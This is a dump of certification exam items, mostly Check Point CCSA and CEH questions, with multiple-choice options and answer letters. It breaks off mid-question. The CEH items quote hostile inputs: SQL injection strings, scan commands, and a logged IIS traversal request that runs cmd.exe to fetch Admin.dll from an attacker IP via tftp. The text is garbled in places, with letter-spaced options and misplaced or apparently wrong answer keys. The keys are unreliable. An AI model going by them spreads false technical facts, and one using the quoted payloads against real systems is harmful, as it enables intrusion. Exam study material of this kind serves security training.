authorized IP address or host. ^D. Client Authentication enables administration to grant access privileges to a specific IP address after successful authentication. B #CCSA Q70. When you make a rule, the rule is not enforces as part of your Security Policy. ^A. True ^B. False E #CCSA Q71. Which of the following user actions would you insert as an INTERNAL Authentication scheme? ^A. The user enters the security dynamics passcode. ^B. The user prompted for a response from the RADIUS server. ^C. The user prompted for a response from the AXENT server. ^D. The user prompted for a response from the TACACS server. ^E. The user enters an operating system account password. A #CCSA Q72. When configuring Static NAT, you cannot map the routable IP address to the external IP address of the Firewall if attempted, the security policy installation fails with the following error ""rule X conflicts with rule Y"". ^A. True ^B. False B #CCSA Q73. The advantage of client authentication is that it can be used for any number of connections and for any services, but authentication is only valid for a specified length of time. ^A. True ^B. False A #CCSA Q74. You have set up Static NAT on a VPN1 to allow Internet traffic to an internal web server. ^ You notice that any HTTP attempts to that machine being dropped in the log due to rule 0. ^ Which of the following is the most likely cause? ^A. Spoofing on the internal interface us set to Network defined by Interface IP and Net Mask. ^B. Spoofing on the external interface is set to Not Defined. ^C. You do NOT have a rule that allows HTTP access to the internal Web Server. ^D. You do NOT have a rule that allows HTTP from the Web Server to Any destination. ^E. None of the above. C #CCSA Q75. As a firewall administrator, you are required to create VPN1 users for authentication. ^ When you create a user for user authentication, the data is stored in the? ^A. Inspect Engine. ^B. Rule base. ^C. Users database ^D. Rulebase fws file ^E. Inspect module. A #CCSA Q76. If users authenticated successfully, they have matched the User and Authentication rule restriction of the user group to which they belong. ^A. True ^B. False B #CCSA Q77. The only way to unblock BLOCKED connections by deleting all the blocking rules from the Rule base. ^A. True ^B. False B #CCSA Q78. When you perform a cp fetch, what can you expect from this command? ^A. Firewall retrieves the user database from the tables on the Management Module. ^B. Firewall retrieves the inspection code from the remote Management Module and installs it to the kernel. ^C. Management module retrieves the IP address of the target specified in the command. ^D. Management module retrieves the interface information for the target specified in the command. ^E. None of the above. B #CCSA Q79. Each incoming UDP packet is locked up in the list of pending connections. Packets are delivered if they are _________. ^A. A request. ^B. A response to a request. ^C. Source routed. ^D. Allowed by the Rule Base. ^E. Both B and D E #CCSA Q80. Assume an NT system. What is the default expiration for a Dynamic NAT connection NOT showing any TCP activity? ^A. 30 Seconds. ^B. 60 Seconds. ^C. 330 Seconds. ^D. 660 Seconds. ^E. 3600 Seconds. B #CCSA Q81. When you disable a rule the rule is NOT disabled until you verify your Security Policy. ^A. True ^B. False B #CCSA Q82. Static Source NAT translates public internal source IP addresses to private external source IP addresses. ^A. True ^B. False B #CCSA Q83. What is the command that lists the interfaces to which VPN1 bound? ^A. Fw ct1 iflist ^B. Ifconfig -a ^C. Ifconfig \all ^D. Netstat -m ^E. Cp bind -all B #CCSA Q84. Your customer has created a rule so that every time a user wants to go to Internet, that user must be authenticated. ^ Which if the following is the best authentication method for roaming users, such as doctors updating patient records at various floor stations in a hospital? ^A. Session ^B. User ^C. Client ^D. Connection ^E. None of the above. C #CCSA Q85. Which command utility allows verification of the Security Policy installed on a firewall module? ^A. Fw ct1 pstat. ^B. Fw printlic. ^C. Fw stat. ^D. Fw ver. ^E. Fw pol. E #CCSA Q86. You are a firewall administrator with one Management Server managing 3 different Enforcement Modules. ^ One of the Enforcement Modules does NOT show up in the dialog box when attempting to install a Security Policy. Which of the following is the most likely cause? ^A. No master file was created. ^B. License for multiple firewalls has expired. ^C. The firewall has NOT been rebooted. ^D. The firewall was NOT listed in the Install On column of the rule. ^E. The firewall is listed as ""Managed by another Management Module (external)"" in the Workstation Properties dialog box. " B #CCSA Q87. In the Install On column of a rule, when you select a specific firewall object as the only configuration object, that rule is enforced on all firewalls with in the network, with related configurations. ^A. True ^B. False E #CCSA Q88. As an administrator, you want to force your users to authenticate. You have selected Client Authentication as your authentication scheme. ^ Users will be using a Web browser to authenticate. On which TCP port will authentication be performed? ^A. 23 ^B. 80 ^C. 259 ^D. 261 ^E. 900 A #CCSA Q90. Client Authentication rules should be placed above the Stealth rule, so users can authenticate to the firewall. ^A. True ^B. False B #CCSA Q91. The following rule base tells you any automatically created NAT rules have simply hidden but have not been deleted from the Rule Base. ^A. True ^B. False B #CCSA Q92. You are using static Destination NAT. You have VPN1 NG running on Windows NT/Solaris platform. ^ By default, routing occurs after the address translation when the packet is passing form the client towards the server. ^A. True ^B. False D #CCSA Q93. Which if the following statements is FALSE? ^A. Dynamic NAT cannot be used for protocols where the port number cannot be changed. ^B. Dynamic NAT cannot be used when an external server must distinguish between clients bases on their IP addresses. ^C. With Dynamic NAT, packet's source port numbers are modified. ^D. In Dynamic NAT, public internal addresses are hidden behind a single private external address using dynamically assigned port numbers to distinguish between them. ^E. Dynamically assigned post numbers are used to distinguish between hidden private addresses. B #CCSA Q94. When you modify a User Template, any users already operating under that template will be updates to the new template properties. ^A. True ^B. False A #CCSA Q95. Installation time for creating network objects will decrease if you list machine names and IP addresses in the hosts files. ^A. True ^B. False C#CEH Q.1 If your concern is hackers coming across the firewall and using SMB session hijacking, ^ you can block that by not allowing UDP ports __________ as well as TCP ports _________ from coming through the firewall. ^ (Select the Best Answer)^A. 167, 345 and 123 and 137^B. 80, 21 and 23, 110^C. 137, 138 and 139, 445^D. 1277, 1270 and 80, 21 D#CEH Q.2 Microsoft has maintained backward compatibility with its older dialects. This backward compatibility means that when a SMB session is initiated, a more primitive plain text level of authentication can often be negotiated that provides for maximum exposure of the password data. ^ Because SMB was developed to facilitate file and print sharing on local networks, a Windows client will automatically attempt to log onto an SMB server. ^ In the process, the host and client will exchange password hashes. ^ These pairs of password hashes, the challenge from the host plus the response from the client, can be sniffed and saved for later cracking by using which of the following hacking tool? (Select the Best Answer)^A. SMBRelay^B. ObiWan^C. Hunt^D. L0phtcrack^E. NBTCracker C#CEH Q.3 How do you prevent SMB Hijacking in Windows operating systems? (Select the Best Answer)^A. Install WINS Server and configure secure authentication.^B. Disable NetBIOS over TCP/IP in Windows NT and 2000.^C. The only effective way to block SMB hijacking is to use SMB signing.^D. Configure 128-bit SMB credentials key-pair in TCP/IP properties. B#CEH Q.4 This tool is a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. ^ You can interactively browse the capture data, viewing summary and detail information for each packet. ^ This tool has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. (Select the Best Answer)^A. Port Scan plus^B. Ethereal^C. Sam Spade^D. Lp0Crack D#CEH Q.5 What is a packet sniffer? (Select the Best Answer)^A. A packet sniffer is a keyboard logger that plugs into computer networks and captures passwords.^B. A packet sniffer is a packet blocker firewall that plugs into computer networks and generates packets.^C. A packet sniffer is a Intrusion Detection System that monitors real time hacking events.^D. A packet sniffer is a wire-tap devices that plugs into computer networks and eavesdrops on the network traffic. ALL#CEH Q.6 What protocols are vulnerable to sniffing? (Select all that apply)^A. Telnet and rlogin^B. HTTP^C. SNMP^D. NNTP^E. POP^F. FTP^G. IMAP A#CEH Q.8 If you want to get a list of all the ip addresses as well as aliases assigned within a domain, you can grab that information if the DNS server allows zone transfers. ^ The zone transfer is the method a secondary DNS server uses to update its information from the primary DNS server. DNS servers within a domain are organized using a master-slave method where the slaves get updated DNS information from the master DNS. ^ Which nslookup command that dump all available records, assuming zone transfers are enabled? (Select the Best Answer)^A. >set type=any > ls -d eccouncil.org >ns.eccouncil.org >exit^B. < list=any < lc -x eccouncil.org< dns.eccouncil.org< exit^C. < set type=any < dir -c eccouncil.org< dns.eccouncil.org< exit^D. < set type=any < list report eccouncil.org< dns.eccouncil.org< exit^E. < set type=any < dns -ls eccouncil.org< dns.eccouncil.org< exit B#CEH Q.9 Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. ^ Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. ^ How do you prevent DNS spoofing? (Select the Best Answer)^A. Disable DNS Mail Relay.^B. Disable DNS Zone Transfer.^C. Install DNS logger and track vulnerable packets.^D. Install DNS Anti-spoofer A#CEH Q.10 Douglas Brown discovered a new worm that targets Microsoft SQL Server installations where the SQL Administrator password is blank (note that this is the default configuration for SQL Server 2000 and earlier). ^ The worm logs in using the Administrator account, then calls a command shell to FTP and install a Trojan. The Trojan communicates with the attacker via IRC, where the attacker is able to utilize the infected systems to launch Distributed Denial of Service (DDoS) attacks. ^ You would like to port scan all the SQL Servers that are vulnerable to this attack in your organization. Which port number you will scan for? (Select the Best Answer)^A. 1433^B. 1432^C. 1434^D. 1435 B#CEH Q.11 This hacking tool runs as a Windows OS stack and hides itself from netstat command. Any directory or file that starts with '_root_' will be hidden. Any process that starts with '_root_' will be hidden. (Select the Best Answer)^A. WINOS Trojan^B. NT Rootkit^C. NubUs^D. Back Orrifice B#CEH Q.12 This Linux program is a daemon intended to catch someone installing a rootkit or running a packet sniffer. ^ It is designed to run continually with a small footprint under an innocuous name. ^ When triggered, it sends email, appends to a logfile, and disables networking or halts the system. It is designed to install with the minimum of disruption to a normal multiuser system, and should not require rebuilding with each kernel change or system upgrade. (Select the Best Answer)^A. cheops^B. chkrootkit^C. desps^D. qswatcher D#CEH Q.13 What does the tool MP3Stego do? (Select the Best Answer)^A. MP3Stego adds watermark to music data in MP3 files during the compression process.^B. MP3Stego encrypts music in MP3 files during the compression process.^C. MP3Stego adds images in MP3 files during the compression process.^D. MP3Stego hides information in MP3 files during the compression process. B#CEH Q.14 This hacking tool when placed over a web page reveals password displayed as "*****". (Select the Best Answer)^A. NAT^B. SnadBoy^C. Password Revealer^D. MugBoy A#CEH Q.15 How long will it take to crack a password using straight dictionary attack (3 million words) on a single 1.5 GHz Intel Pentium machine? (Select the Best Answer)^A. 2.5 mins^B. 13.6 days^C. 4.2 hours^D. 4.6 days C#CEH Q.16 This tool is a remote scanner for the most common Distributed Denial of Service programs. These were the programs responsible for the recent rash of attacks on high profile web sites such as Yahoo, Amazon, eBay. ^ This tool will detect Trinoo, Stacheldraht and Tribe Flood Network programs running with their default settings. (Select the Best Answer)^A. DDoScanner^B. DoSMinger^C. DDoSPing^D. DDoSKiller B#CEH Q.17 This tool from GFI is a freeware security scanner to audit your network security. It scans entire networks and provides NETBIOS information for each computer such as hostname, shares, logged on user name. ^ It does OS detection, tests password strength, detects registry issues. Reports are outputted in HTML. ^ This tool checks the network for all potential methods that a hacker might use to attack a network. ^ By analyzing the operating system and the applications running on your network, it identifies possible security holes in the network. In other words, it plays the devil's advocate and alerts weaknesses before a hacker can find them, enabling the administrator to deal with these issues before a hacker can exploit them.(Select the Best Answer)^A. SAN Secure Scanner^B. LANGuard Network Scanner^C. GFI Guard^D. Sentinel Scanner B#CEH Q.18 The tool MingSweeper. What is it used for? (Select the Best Answer)^A. MingSweeper is a session hijacking tool.^B. MingSweeper is a network reconnaissance tool.^C. MingSweeper is an ARP poisoning tool.^D. MingSweeper is a port scanner. A#CEH Q.19 What does the hacking tool NetCat do? (Select the Best Answer)^A. NetCat is called the TCP/IP swiss army knife It is a simple Unix utility which reads and writes data across network connections using TCP or UDP protocol.^B. NetCat is a powerful tool for network monitoring and data acquisition This program allows you to dump the traffic on a network. It can be used to print out the headers of packets on a network interface that matches a given expression.^C. NetCat is a flexible packet sniffer/logger that detects attacks. NetCat is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system.^D. NetCat is a security assesment tool based on SATAN (Security Administrator's Integrated Network Tool). C#CEH Q.20 What is Whisker? (Select the Best Answer)^A. Whisker is a Trojan virus.^B. Whisker is an application scanner.^C. Whisker is a CGI vulnerability scanner^D. Whisker is a SNMP dumping tool. D#CEH Q.21 This tool is a file and directory integrity checker. It aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, ^ it can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. (Select the Best Answer)^A. Hping2^B. DSniff^C. Cybercop Scanner^D. Tripwire C#CEH Q.22 This is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. ^ It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. ^ Using this tool, you can: test firewall rules, perform [spoofed] port scanning, test net performance using different protocols, packet size, TOS (type of service), and fragmentation, do path MTU discovery, tranfer files (even between really Fascist firewall rules), perform traceroute-like actions under different protocols, fingerprint remote OSs, audit a TCP/IP stack, etc. (Select the Best Answer)^A. Nemesis^B. Lids^C. Hping2^D. Cybercop Scanner B#CEH Q.23 WinTrinoo is an example of: (Select the Best Answer)^A. Firewall^B. DDoS Attack tool^C. Virus Scanner^D. Trojan Program B#CEH Q.24 Which of the following Nmap command launches a stealth SYN scan against each machine that is up out of the 255 machines on class ´C´ where target.example.com resides and tries to determine what operating system is running on each host that is up and running? (Select the Best Answer)^A. nmap -v target.example.com^B. nmap -sS -O target.example.com/24^C. nmap -sX -p 22,53,110,143,4564 198.116.*.1-127^D. nmap -XS -O target.example.com A#CEH Q.26 Snort is a Linux based Intrusion Detection System. Which command enables Snort into network intrusion detection (NIDS) mode assuming snort.conf is the name of your rules file and the IP address is: 192.168.1.0 with Subnet Mask:255.255.255.0? (Select the Best Answer)^A. ./snort -c snort.conf 192.168.1.0/24^B. ./snort 192.168.1.0/24 -x snort.conf^C. ./snort -dev -l ./log -a 192.168.1.0/8 -c snort.conf^D. ./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf C#CEH Q.27 Many web based authentication models revolve around solely trusting cookies for verification of a user's session. If a malicious person can obtain a user's cookies for a service, then he can use those cookies to access the victim's account. ^ Pages that can use a server's cookies are limited to that particular server, or higher-level domain servers (like hotmail.passport.com for '.passport.com' cookies). ^ In order for a malicious person to obtain a victim's cookies for a site, he must manufacture a fake javascript that must execute within a page from that same domain. ^ This is done by manipulating the error messages that are returned, either from 404 requests or form elements that are echoed back to the screen unescaped. For example, by sending a web-mail user an email with a link to the very same server, the link looks harmless, and it can trick the user into clicking on the link, thus running the embedded javascript and sending his cookies to the malicious person. How do you prevent thiype of cookie hijacking? (Select the Best Answer)^A. Escaping all form data that is echoed to the screen and not echoing 404 file requests eliminates this problem.^B. Setting up some secondary authentication requirement other than cookie information would at least make this session-stealing problem a lesser threat.^C. Enabling SSL on all the authentication pages will solve the problem.^D. Implement 128-bit cookie security on all your sessions with the client browser. A#CEH Q.28 Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow. A vulnerability in the ASP (Active Server Pages) ISAPI filter, loaded by default on all NT4 and Windows 2000 server systems (running IIS), can be exploited to remotely execute code of an attackers choice. ^ The fault lies within the decoding and interpretation of form data received by malicious clients. ^ By chunk encoding form data we can force IIS to overwrite 4 bytes of arbitrary memory with data we supply. This is a very serious vulnerability and Microsoft suggests that administrators install the supplied patch as soon as possible. ^ What is the patch number, which fixes this bug in IIS? (Select the Best Answer)^A. Microsoft Security Bulletin MS02-018^B. Microsoft Security Bulletin MS02-456^C. Microsoft Security Bulletin MS02-056^D. Microsoft Security Bulletin MS02-234 E#CEH Q.29 tini is a simple and very small (3kb) trojan backdoor for Windows, coded in assembler. It listens at TCP port and connects via remote Command Prompt. What port number does it listen on by default? (Select the Best Answer)^A. 3333^B. 4444^C. 5555^D. 6666^E. 7777 C#CEH Q.30 Which of the following program is capable of detecting and removing more than 1000 Trojan Horses from your system? (Select the Best Answer)^A. NuBuS^B. SubSeven^C. Tauscan^D. BO^E. Tini^F. TrojanKiller D#CEH Q.31 What is Zombie Zapper? (Select the Best Answer)^A. Zombie Zapper is a DDoS tool that installs on a victim's machine as "zombie".^B. Zombie Zapper is a firewall, which works on Linux and Solaris OS.^C. Zombie Zapper is a trojan that listens on port 2345.^D. Zombie Zapper is a free, open source tool that can tell a zombie system flooding packets to stop flooding. B,C#CEH Q.32 Which of the following are examples of Distributed Denial of Service (DDoS) attack tools? (Select all that apply)^A. WinTrinoo^B. TFN2K^C. Stacheldraht^D. Knight^E. Kayton^F. GTBot B#CEH Q.33 Netcat is a simple network utility which reads and writes data across network connections, using TCP or UDP protocol. Which of the following command scans for open ports between [1 - 140]? (Select the Best Answer)^A. nc -xx -q -w2 my-attacker-IP-address [1-140]^B. nc -vv -z -w2 my-attacker-IP-address 1-140^C. nc my-attacker-IP-address (1,140)^D. nc 140 my-attacker-IP-address -vv B#CEH Q.34 This network tool is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all higher level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. ^ This tool isolates security problems, fully decodes 802.11a and 802.11b WLAN protocols, and analyzes wireless network performance with accurate identification of signal strength, channel and data rates. (Select the Best Answer)^A. AeroSeek^B. AiroPeek^C. AirMan^D. AirCell^E. AirWire D#CEH Q.35 Which of the following is a wireless LAN (WLAN) tool which recovers encryption keys. (Select the Best Answer)^A. AirPeek^B. AirMan^C. Airport^D. AirSnort D#CEH Q.36 "Anonymous web surfing" is a proxy server, which downloads the webpage you requested and then displays the web page to you through an encrypted URL. ^ Since your computer doesn't make a connection to the server, it brings it to you totally anonymous, and they have no idea you were there, and information about you and your computer isn't gathered by that website. ^ All you do is type in the web site you want to visit and you will be taken there promptly and securely. Which of the following web site provides free anonymous web surfing services? (Select the Best Answer)^A. http://www.anoyume.com^B. http://www.privacybusters.com^C. http://www.badboys.com^D. http://www.silenter.com B#CEH Q.37 Which hacking tool exploits Microsoft Windows 2000 IIS 5.0 IPP ISAPI 'Host:' Buffer Overflow Vulnerability?(Select the Best Answer)^A. IIS Lockdown^B. Jill-32^C. IPP Scanner^D. IPP Exploit^E. URLScan C#CEH Q.38 Which of the following is a ramdisk-based Linux distribution that boots from a single floppy and loads it packages from an HTTP/FTP server? (Select the Best Answer)^A. Red Hat Linux^B. Turbo Linux^C. Trinux^D. Flopix^E. Raminux A#CEH Q.39 SQL injection is usually caused by developers who use "string-building" techniques in order to execute SQL code. For example, in a search page, the developer may use the following code to execute a query: ^ Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'") ^ Which of the following prevents SQL injection on a web page? (Select the Best Answer)^A. For string data, replace single quotes with two single quotes using the replace function or equivalent : goodString = replace(inputString,','')^B. For string data, replace double quotes with two single quotes using the replace function or equivalent: goodString = replace(inputString,'','')^C. For string data, replace single quotes with asterix using the replace function or equivalent: goodString = replace(inputString,',*)^D. For string data, replace single quotes with two underscore characters using the replace function or equivalent: goodString = replace(inputString,',__) D#CEH Q.40 How do you test SQL injection vulnerability on a Web page? (Select the Best Answer)^A. Input "asterix character" something like:^ hi* or 1=1-- ^ Into login, or password, or in the URL. Example:^ Login: hi* or 1=1--^ Pass: hi* or 1=1--^ http://duck/index.asp?id=hi* or 1=1- ^B. Input "underscore character" something like:^ hi__ or 1=1--^ Into login, or password, or in the URL. Example:^ Login: hi__ or 1=1--^ Pass: hi__ or 1=1--^ http://duck/index.asp?id=hi__ or 1=1--^C. Input "double quote" something like:^ hi'' or 1=1--^ Into login, or password, or in the URL. Example:^ Login: hi'' or 1=1--^ Pass: hi'' or 1=1--^ http://duck/index.asp?id=hi'' or 1=1--^D. Input "single quote" something like:^ hi' or 1=1--^ Into login, or password, or in the URL. Example:^ Login: hi' or 1=1--^ Pass: hi' or 1=1--^ http://duck/index.asp?id=hi' or 1=1-- A#CEH Q.41 Which of the following is a dictionary attack tool for Microsoft SQL Server, which lets you test if the login accounts are strong enough to resist an attack? (Select the Best Answer)^A. SQLdict^B. SQLAttack^C. SQLWalker^D. C-Q-L-HACK B#CEH Q.42 Which of the following is a hacking tool that has the ability to hijack TCP sessions? For example, you can capture the contents of a Telnet session and spy on what a person is doing, or hijack the session and start typing in your own commands. (Select the Best Answer)^A. JungleBungle^B. Juggernaut^C. SesHijack^D. TCP Kidnapper A#CEH Q.43 Smurf attacks are the easiest distributed DOS attack to commit. ^ In its simplest form, the attacker begins by using a commonly available program to scan the Internet to locate routers that that allow entry to broadcast pings. ^ When he or she locates this kind of router, then next step is to forge ping packets with the origination address of the intended victim. This is done using packet manipulation tools. ^ This type of attack can also use other Internet Control Message Protocol (ICMP) techniques. ^ To avoid arrest, the attacker will typically use a hacked computer to send out these forged ping packets. ^ These packets are then sent to the network behind the vulnerable router. ^ Each computer on this network echoes each attacking ping out to the victim designated in the ping's forged header. ^ So if there are two hundred computers on this intermediary network, for every single ping of the attacking computer, they will send 200 pings out to the victim. ^ How do you defend against these typeof Smurf attack?(Select the BeSt Answer)^A. deny broadcast pings at the intermediary network's border router.^B. deny ICMP at the intermediary network's border router.^C. deny smurf 34.6 type frames at the firewall.^D. enable broadcast pings at the intermediary network's border router. D#CEH Q.44 Which tool detects the presence of Trinoo, TFN, or Stacheldraht clients on your machine? (Select the Best Answer)^A. DDoS Detector^B. TrinooBuster^C. TFNKiller^D. RID C#CEH Q.45 Trinoo is a dangerous distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. A trin00 network consists of a small number of servers, or masters, and a large number of clients, or daemons. ^ The denial of service attack utilizing a trin00 network is carried out by an intruder connecting to a trin00 master and instructing that master to launch a denial of service attack against one or more IP addresses. The trin00 master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time. What default port does the master sends UDP broadcast packets to the daemon? (Select the Best Answer)^A. 27445^B. 27447^C. 27444^D. 27449 C#CEH Q.46 Buffer overflow attacks exploit a lack of bounds checking on the size of input being stored in a buffer array. ^ By writing data past the end of an allocated array, the attacker can make arbitrary changes to program state stored adjacent to the array. How do you protect your system from buffer overflow exploits? (Select the Best Answer)^A. Install a firewall system which protects from buffer overflow exploits.^B. Install an IDS system which protects from buffer overflow exploits.^C. Proper OS Patch maintenance is the best way to protect your systems from the buffer overflow attack.^D. Proper virus pattern maintenance is the best way to protect your systems from the buffer overflow attack. D#CEH Q.47 First appearing on September 18, 2001, Nimda is a computer virus that caused traffic slowdowns as it rippled across the Internet, spreading through four different methods, infecting computers containing Microsoft's Web server, Internet Information Server (IIS), and computer users who opened an e-mail attachment. ^ Like a number of predecessor viruses, Nimda's payload appears to be the traffic slowdown itself - that is, it does not appear to destroy files or cause harm other than the considerable time that may be lost to the slowing or loss of traffic known as denial-of-service and the restoring of infected systems. With its multi-pronged attack, Nimda appears to be the most troublesome virus of its type that has yet appeared. Nimda virus refers to a file, when run, continues to propagate the virus. What is the name of this file? (Select the Best Answer)^A. cmd.exe^B. patch.exe^C. explorer.dll^D. admin.dll B#CEH Q.48 What buffer overflow vulnerability does Nimda virus exploit to gains access to IIS servers? (Select the Best Answer)^A. Internet Printing Protocol (IPP)^B. ISAPI DLL^C. Windows 2000 KRNLOS.EXE^D. IIS SMTP Services A#CEH Q.50 This is a Novell Netware hacking tool which simulates a Novell file server. The serverwill be visible for about 1 to 2 minutes. ^ On some systems the server willbe visible for as long as the program is running. (Select the Best Answer)^A. Novelffs^B. Novell Faker^C. Noveknell^D. Novell Detector C#CEH Q.51 Digging into the rubbish bin to find pieces of information is an example of what attack (Select the Best Answer)^A. Spoofing^B. Social Engineering^C. Dumpster Diving^D. Information gathering B,C#CEH Q.52 In a man-in-the-middle (MiTM)attack of a SSL connection sniffing, which of the following are true?^ Session Key A Session Key B^ Server ß--------------ŕ middle man ß---------------ŕ Client^ (Select all that apply)^A. Session Key A is sent by middle man and encrypted by client public key^B. Session Key B is sent by client and encrypted by middle man public key^C. Session Key A is sent by middle man and encrypted by server public key^D. Session Key B is sent by client and encrypted by client public key^E. Session Key A is sent by middle man and encrypted by client private key^F. Session Key B is sent by client and encrypted by server private key D#CEH Q.53 Which of the following network connection is or are encrypted and cannot be sniffed by an attacker on the network? (Select the Best Answer)^A. Telnet^B. POP3^C. NFS^D. SSH^E. SMTP B#CEH Q.54 In the Linux BIND NXT bug remote root exploit attack, the hacker inserts the shell code in which of the following connection? (Select the Best Answer)^A. UDP on victim port 53^B. TCP on victim port 53^C. UDP on victim port above 1024^D. TCP on victim port above 1024 D#CEH Q.55 An attacker on a Linux system may be able to recover a removed file from a disk using which of the following technique? (Select the Best Answer)^A. if he knows the name of the removed file^B. if he knows the date the file was removed^C. if he knows the size of the file that was removed^D. if he knows the inode value of the removed file C#CEH Q.56 This is a firewall filter rules configured on a Linux system:^ # set the default to deny all incoming network traffic^ /sbin/ipchains -P input DENY^ # Allow incoming TCP traffic^ /sbin/ipchains -A input -i eth0 -p tcp ! -y -s any/0 -j ACCEPT^ An attacker sends a huge packet targeted towards the Linux system. Which of the following does the firewall will not block from an attack? (Select all that apply)^A. TCP connection scan^B. Half connect()^C. FIN scan^D. Xmas scan^E. Null scan A#CEH Q.57 Which of the following filter rules configured on a Linux system will block all outgoing ssh and telnet traffic to the hosts of the IP range 192.168.0.0 to 192.168.39.255? (Select the Best Answer)^A. i p c h a i n s - A o u t p u t - p t c p - s a n y / 0 - d 1 9 2 . 1 6 8 . 0 . 0 / 1 9 2 2 : 2 3 - j D E N Y _ l ipchains -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l^B. i p t a b l e s - A i n p u t - r I C M P - s a n y / 0 - d 1 9 2 . 1 6 8 . 0 . 0 / 1 9 2 3 : 2 2 - j D E N Y _ li p t a b l e s - A o u t p u t - p t c p - s a n y / 0 - d 1 9 2 . 1 6 8 . 3 2 . 0 / 2 1 2 3 : 2 2 - j D E N Y _ l^C. i p c o m m a n d - A o u t p u t - p t c p - s p e r m i t / 1 - d 1 9 2 . 1 6 8 . 0 . 0 / 1 9 2 2 : 2 3 - j A L L O W _ li p c o m m a n d - A o u t p u t - p t c p - s p e r m i t / 1 - d 1 9 2 . 1 6 8 . 3 2 . 0 / 2 1 2 2 : 2 3 - j A L L O W _ l^D. i p f i l t e r - A o u t p u t - p t c p - s a n y / 0 - d 1 9 2 . 1 6 8. 0 . 0 / 1 9 2 2 : 2 3 - j D E N Y _ l ipfilter -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l C#CEH Q.58 From the following spam mail header, identify the host IP that sent this spam?^ Note: This question includes an HTML table which may not be accurately rendered^ From jie02@netvigator.com Tue Nov 27 17:27:11 2001^ Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)^ Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)^ Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk^ From: "china hotel web"^ To: "Shlam"^ Subject: SHANGHAI (HILTON HOTEL) PACKAGE^ Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0^ X-Priority: 3 X-MSMail-^ Priority: Normal^ Reply-To: "china hotel web"^ (Select the Best Answer)^A. 137.189.96.52^B. 203.218.39.50^C. 203.218.39.20^D. 8.12.1.0 A#CEH Q.59 A httpd access_log file shows a WEB-IIS attack from a remote host^ 04:47:14 137.68.238.15 GET /scripts/..%5c../winnt/system32/cmd.exe 404^ Which of the following will provide the organization (in full name) that owns the whole IP block of the remote host (i.e. 137.68.0.0 - 137.68.255.255)? (Select the Best Answer)^A. #whois 137.68.238.15@whois.arin.net^B. #arin 137.68.238.15^C. # t u c o w s _ t 1 3 7 . 6 8 . 2 3 8 . 1 5^D. #dlookup 137.68.238.15@name -l D#CEH Q.60 Buffer overflow exploit can change the execution flow of a program because: (Select all that apply)^A. it injects shell code in the stack^B. it stuffs many 90 NOP code to the stack^C. it stuffs too many data into local function variables^D. it overwrites the return address of a call function in the stack B,C,D#CEH Q.61 Which of the following techniques are used for insertion attack on IDS? (Select all that apply)^A. Using IP Fragmentation^B. Using Invalid sequence no.^C. Using incorrect TCP checksum^D. Using short TTL^E. Using non-existent SYN packet flood A#CEH Q.62 The following is tcpdump packets of an ARP poisoning Man-in-the-Middle (MITM) attack.^ 0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^ 0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^ 0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^ 0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^ 0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^ What is the MAC address of the middleman? (Select the Best Answer)^A. 0:50:56:47:0:61^B. 0:50:56:47:0:65^C. 0:50:56:47:0:46 C#CEH Q.63 John's department Web site has been hacked. He reviews the Web site logs and discovers the following log entries:^ 34.5.67.4 is the IP address of the attacker:^ GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/ c+tftp%20-i%34.5.67.4%20GET%20Admin.dll%20c:\Admin.dll^ Which of the following worm is responsible for this attack? (Select the Best Answer)^A. Mellisa^B. SQL Slammer^C. Nimda^D. Code Red C#CEH Q.64 Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. ^ Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. ^ Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password ''just to double check our records.'' Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe.^ This is an example of what attack? (Select the Best Answer)^A. Reverse Psychology^B. Reverse Engineering^C. Social Engineering^D. Spoofing Identity^E. Faking Identity A#CEH Q.65 On October 7, 2001, NASA suffered massive attacks. Files were taken and employees' directories were invaded. ^ The intruders left methods to regain access to the system, called ''back doors,'' to allow them to reenter at any point in the future. ^ The attackers used a malicious program that disguises itself as a Word document and uses a flaw in the Word program for its attack. ^ Once the file is opened, it can steal log files and passwords. These are then sent back to the 